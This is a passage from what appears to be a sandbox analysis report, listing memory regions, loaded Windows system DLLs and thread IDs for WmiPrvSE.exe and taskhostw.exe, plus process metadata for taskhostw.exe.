	          end_va = 0x1fe568c2fff
	     entry_point = 0x1fe568c0000
	     region_type = mapped_file
	            name = "wmi.dll"
	        filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll")

Region:
	              id = 1555
	        start_va = 0x1fe568d0000
	          end_va = 0x1fe568d2fff
	     entry_point = 0x1fe568d0000
	     region_type = mapped_file
	            name = "cimwin32.dll.mui"
	        filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui")

Region:
	              id = 1556
	        start_va = 0x1fe568e0000
	          end_va = 0x1fe568e2fff
	     entry_point = 0x1fe568e0000
	     region_type = mapped_file
	            name = "security.dll"
	        filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll")

Region:
	              id = 1557
	        start_va = 0x1fe56950000
	          end_va = 0x1fe5695ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fe56950000"
	        filename = ""

Region:
	              id = 1558
	        start_va = 0x1fe56960000
	          end_va = 0x1fe56c96fff
	     entry_point = 0x1fe56960000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1559
	        start_va = 0x1fe56ca0000
	          end_va = 0x1fe56e27fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe56ca0000"
	        filename = ""

Region:
	              id = 1560
	        start_va = 0x1fe56e30000
	          end_va = 0x1fe56fb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe56e30000"
	        filename = ""

Region:
	              id = 1561
	        start_va = 0x1fe56fc0000
	          end_va = 0x1fe570bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fe56fc0000"
	        filename = ""

Region:
	              id = 1562
	        start_va = 0x1fe570c0000
	          end_va = 0x1fe571bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fe570c0000"
	        filename = ""

Region:
	              id = 1563
	        start_va = 0x7df5ff6b0000
	          end_va = 0x7ff5ff6affff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff6b0000"
	        filename = ""

Region:
	              id = 1564
	        start_va = 0x7ff66e350000
	          end_va = 0x7ff66e44ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff66e350000"
	        filename = ""

Region:
	              id = 1565
	        start_va = 0x7ff66e450000
	          end_va = 0x7ff66e472fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff66e450000"
	        filename = ""

Region:
	              id = 1566
	        start_va = 0x7ff66f170000
	          end_va = 0x7ff66f1effff
	     entry_point = 0x7ff66f170000
	     region_type = mapped_file
	            name = "wmiprvse.exe"
	        filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")

Region:
	              id = 1567
	        start_va = 0x7ffbf77a0000
	          end_va = 0x7ffbf77b3fff
	     entry_point = 0x7ffbf77a0000
	     region_type = mapped_file
	            name = "browcli.dll"
	        filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll")

Region:
	              id = 1568
	        start_va = 0x7ffbfdd00000
	          end_va = 0x7ffbfdecefff
	     entry_point = 0x7ffbfdd00000
	     region_type = mapped_file
	            name = "cimwin32.dll"
	        filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")

Region:
	              id = 1569
	        start_va = 0x7ffbfe150000
	          end_va = 0x7ffbfe19dfff
	     entry_point = 0x7ffbfe150000
	     region_type = mapped_file
	            name = "framedynos.dll"
	        filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")

Region:
	              id = 1570
	        start_va = 0x7ffc048e0000
	          end_va = 0x7ffc04905fff
	     entry_point = 0x7ffc048e0000
	     region_type = mapped_file
	            name = "srvcli.dll"
	        filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")

Region:
	              id = 1571
	        start_va = 0x7ffc06260000
	          end_va = 0x7ffc06275fff
	     entry_point = 0x7ffc06260000
	     region_type = mapped_file
	            name = "ncobjapi.dll"
	        filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")

Region:
	              id = 1572
	        start_va = 0x7ffc063e0000
	          end_va = 0x7ffc06404fff
	     entry_point = 0x7ffc063e0000
	     region_type = mapped_file
	            name = "wmiutils.dll"
	        filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")

Region:
	              id = 1573
	        start_va = 0x7ffc06410000
	          end_va = 0x7ffc06423fff
	     entry_point = 0x7ffc06410000
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 1574
	        start_va = 0x7ffc06430000
	          end_va = 0x7ffc06525fff
	     entry_point = 0x7ffc06430000
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 1575
	        start_va = 0x7ffc06b60000
	          end_va = 0x7ffc06b6dfff
	     entry_point = 0x7ffc06b60000
	     region_type = mapped_file
	            name = "winbrand.dll"
	        filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")

Region:
	              id = 1576
	        start_va = 0x7ffc06b80000
	          end_va = 0x7ffc06b90fff
	     entry_point = 0x7ffc06b80000
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 1577
	        start_va = 0x7ffc07e60000
	          end_va = 0x7ffc07edefff
	     entry_point = 0x7ffc07e60000
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 1578
	        start_va = 0x7ffc07fd0000
	          end_va = 0x7ffc07fdbfff
	     entry_point = 0x7ffc07fd0000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")

Region:
	              id = 1579
	        start_va = 0x7ffc0bfc0000
	          end_va = 0x7ffc0bfd1fff
	     entry_point = 0x7ffc0bfc0000
	     region_type = mapped_file
	            name = "cscapi.dll"
	        filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")

Region:
	              id = 1580
	        start_va = 0x7ffc0d0c0000
	          end_va = 0x7ffc0d0d8fff
	     entry_point = 0x7ffc0d0c0000
	     region_type = mapped_file
	            name = "samcli.dll"
	        filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")

Region:
	              id = 1581
	        start_va = 0x7ffc0f810000
	          end_va = 0x7ffc0f825fff
	     entry_point = 0x7ffc0f810000
	     region_type = mapped_file
	            name = "wkscli.dll"
	        filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")

Region:
	              id = 1582
	        start_va = 0x7ffc0fae0000
	          end_va = 0x7ffc0faeafff
	     entry_point = 0x7ffc0fae0000
	     region_type = mapped_file
	            name = "schedcli.dll"
	        filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll")

Region:
	              id = 1583
	        start_va = 0x7ffc0fbb0000
	          end_va = 0x7ffc0fbc0fff
	     entry_point = 0x7ffc0fbb0000
	     region_type = mapped_file
	            name = "wmiclnt.dll"
	        filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")

Region:
	              id = 1584
	        start_va = 0x7ffc0fe00000
	          end_va = 0x7ffc0fe3dfff
	     entry_point = 0x7ffc0fe00000
	     region_type = mapped_file
	            name = "logoncli.dll"
	        filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")

Region:
	              id = 1585
	        start_va = 0x7ffc0ff70000
	          end_va = 0x7ffc0ff79fff
	     entry_point = 0x7ffc0ff70000
	     region_type = mapped_file
	            name = "dsrole.dll"
	        filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")

Region:
	              id = 1586
	        start_va = 0x7ffc12e30000
	          end_va = 0x7ffc12e3bfff
	     entry_point = 0x7ffc12e30000
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")

Region:
	              id = 1587
	        start_va = 0x7ffc12f70000
	          end_va = 0x7ffc12fe9fff
	     entry_point = 0x7ffc12f70000
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")

Region:
	              id = 1588
	        start_va = 0x7ffc136a0000
	          end_va = 0x7ffc136ccfff
	     entry_point = 0x7ffc136a0000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")

Region:
	              id = 1589
	        start_va = 0x7ffc13950000
	          end_va = 0x7ffc13978fff
	     entry_point = 0x7ffc13950000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 1590
	        start_va = 0x7ffc13a40000
	          end_va = 0x7ffc13a8afff
	     entry_point = 0x7ffc13a40000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 1591
	        start_va = 0x7ffc13a90000
	          end_va = 0x7ffc13a9ffff
	     entry_point = 0x7ffc13a90000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")

Region:
	              id = 1592
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 1593
	        start_va = 0x7ffc142a0000
	          end_va = 0x7ffc142b6fff
	     entry_point = 0x7ffc142a0000
	     region_type = mapped_file
	            name = "netapi32.dll"
	        filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")

Region:
	              id = 1594
	        start_va = 0x7ffc142c0000
	          end_va = 0x7ffc14486fff
	     entry_point = 0x7ffc142c0000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")

Region:
	              id = 1595
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 1596
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 1597
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 1598
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 1599
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 1600
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 1601
	        start_va = 0x7ffc16550000
	          end_va = 0x7ffc165f6fff
	     entry_point = 0x7ffc16550000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 1602
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 1603
	        start_va = 0x7ffc16970000
	          end_va = 0x7ffc169dafff
	     entry_point = 0x7ffc16970000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 1604
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 1605
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 1606
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 1607
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 1608
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1609
	        start_va = 0x7ffc0c8d0000
	          end_va = 0x7ffc0c907fff
	     entry_point = 0x7ffc0c8d0000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")

Region:
	              id = 1610
	        start_va = 0x7ffc16fa0000
	          end_va = 0x7ffc16fa7fff
	     entry_point = 0x7ffc16fa0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")

Region:
	              id = 1611
	        start_va = 0x7ffc0c510000
	          end_va = 0x7ffc0c525fff
	     entry_point = 0x7ffc0c510000
	     region_type = mapped_file
	            name = "dhcpcsvc6.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")

Region:
	              id = 1612
	        start_va = 0x7ffc0c4f0000
	          end_va = 0x7ffc0c509fff
	     entry_point = 0x7ffc0c4f0000
	     region_type = mapped_file
	            name = "dhcpcsvc.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")

Region:
	              id = 1613
	        start_va = 0x7ffc12490000
	          end_va = 0x7ffc12539fff
	     entry_point = 0x7ffc12490000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")


Thread:
	id = 158
	os_tid = 0xcfc


Thread:
	id = 159
	os_tid = 0x908


Thread:
	id = 160
	os_tid = 0x9fc


Thread:
	id = 161
	os_tid = 0x64c


Thread:
	id = 162
	os_tid = 0x504


Thread:
	id = 163
	os_tid = 0x350


Thread:
	id = 164
	os_tid = 0x334


Thread:
	id = 165
	os_tid = 0x26c


Thread:
	id = 166
	os_tid = 0x210


Thread:
	id = 167
	os_tid = 0x200


Process:
	id = "7"
	image_name = "taskhostw.exe"
	filename = "c:\\windows\\system32\\taskhostw.exe"
	page_root = "0x6a0c000"
	os_pid = "0xf0c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "5"
	os_parent_pid = "0x3b8"
	cmd_line = "taskhostw.exe"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1614
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1615
	        start_va = 0xdff4800000
	          end_va = 0xdff49fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000dff4800000"
	        filename = ""

Region:
	              id = 1616
	        start_va = 0xdff4a00000
	          end_va = 0xdff4a7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000dff4a00000"
	        filename = ""

Region:
	              id = 1617
	        start_va = 0x2da7e9b0000
	          end_va = 0x2da7e9cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002da7e9b0000"
	        filename = ""

Region:
	              id = 1618
	        start_va = 0x2da7e9d0000
	          end_va = 0x2da7e9e4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7e9d0000"
	        filename = ""

Region:
	              id = 1619
	        start_va = 0x2da7e9f0000
	          end_va = 0x2da7e9f3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7e9f0000"
	        filename = ""

Region:
	              id = 1620
	        start_va = 0x2da7ea00000
	          end_va = 0x2da7ea00fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7ea00000"
	        filename = ""

Region:
	              id = 1621
	        start_va = 0x2da7ea10000
	          end_va = 0x2da7ea11fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002da7ea10000"
	        filename = ""

Region:
	              id = 1622
	        start_va = 0x7df5ff920000
	          end_va = 0x7ff5ff91ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff920000"
	        filename = ""

Region:
	              id = 1623
	        start_va = 0x7ff6c2fc0000
	          end_va = 0x7ff6c2fe2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6c2fc0000"
	        filename = ""

Region:
	              id = 1624
	        start_va = 0x7ff6c3c10000
	          end_va = 0x7ff6c3c28fff
	     entry_point = 0x7ff6c3c10000
	     region_type = mapped_file
	            name = "taskhostw.exe"
	        filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")

Region:
	              id = 1625
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1626
	        start_va = 0x2da7e9b0000
	          end_va = 0x2da7e9bffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7e9b0000"
	        filename = ""

Region:
	              id = 1627
	        start_va = 0x2da7ea20000
	          end_va = 0x2da7eaddfff
	     entry_point = 0x2da7ea20000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1628
	        start_va = 0x2da7ec10000
	          end_va = 0x2da7ed0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002da7ec10000"
	        filename = ""

Region:
	              id = 1629
	        start_va = 0x7ff6c2ec0000
	          end_va = 0x7ff6c2fbffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6c2ec0000"
	        filename = ""

Region:
	              id = 1630
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 1631
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 1632
	        start_va = 0xdff4a80000
	          end_va = 0xdff4afffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000dff4a80000"
	        filename = ""

Region:
	              id = 1633
	        start_va = 0x2da7eb40000
	          end_va = 0x2da7eb4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002da7eb40000"
	        filename = ""

Region:
	              id = 1634
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 1635
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 1636
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 1637
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 1638
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 1639
	        start_va = 0x2da7e9c0000
	          end_va = 0x2da7e9c6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002da7e9c0000"
	        filename = ""

Region:
	              id = 1640
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 1641
	        start_va = 0x2da7eae0000
	          end_va = 0x2da7eae6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002da7eae0000"
	        filename = ""

Region:
	              id = 1642
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 1643
	        start_va = 0xdff4b00000
	          end_va = 0xdff4b7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000dff4b00000"
	        filename = ""

Region:
	              id = 1644
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 1645
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 1646
	        start_va = 0x2da7ed10000
	          end_va = 0x2da7ee97fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7ed10000"
	        filename = ""

Region:
	              id = 1647
	        start_va = 0x7ffc167d0000
	          end_va = 0x7ffc1680afff
	     entry_point = 0x7ffc167d0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 1648
	        start_va = 0x2da00000000
	          end_va = 0x2da013fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da00000000"
	        filename = ""

Region:
	              id = 1649
	        start_va = 0x2da7eaf0000
	          end_va = 0x2da7eaf1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7eaf0000"
	        filename = ""

Region:
	              id = 1650
	        start_va = 0x2da7eb00000
	          end_va = 0x2da7eb00fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7eb00000"
	        filename = ""

Region:
	              id = 1651
	        start_va = 0x2da7eb10000
	          end_va = 0x2da7eb10fff
	     entry_point = 0x2da7eb10000
	     region_type = mapped_file
	            name = "taskhostw.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui")

Region:
	              id = 1652
	        start_va = 0x2da7eb20000
	          end_va = 0x2da7eb20fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002da7eb20000"
	        filename = ""

Region:
	              id = 1653
	        start_va = 0x2da7eb30000
	          end_va = 0x2da7eb30fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002da7eb30000"
	        filename = ""

Region:
	              id = 1654
	        start_va = 0x2da7eea0000
	          end_va = 0x2da7f020fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7eea0000"
	        filename = ""

Region:
	              id = 1655
	        start_va = 0x7ffc123a0000
	          end_va = 0x7ffc12435fff
	     entry_point = 0x7ffc123a0000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 1656
	        start_va = 0x2da7eb50000
	          end_va = 0x2da7eb5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002da7eb50000"
	        filename = ""

Region:
	              id = 1657
	        start_va = 0x7ffc16810000
	          end_va = 0x7ffc16969fff
	     entry_point = 0x7ffc16810000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 1658
	        start_va = 0x2da7eb60000
	          end_va = 0x2da7eb63fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7eb60000"
	        filename = ""

Region:
	              id = 1659
	        start_va = 0x2da7f030000
	          end_va = 0x2da7f0ebfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7f030000"
	        filename = ""

Region:
	              id = 1660
	        start_va = 0x7ffc119f0000
	          end_va = 0x7ffc11a11fff
	     entry_point = 0x7ffc119f0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 1661
	        start_va = 0xdff4b80000
	          end_va = 0xdff4bfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000dff4b80000"
	        filename = ""

Region:
	              id = 1662
	        start_va = 0x2da7eb70000
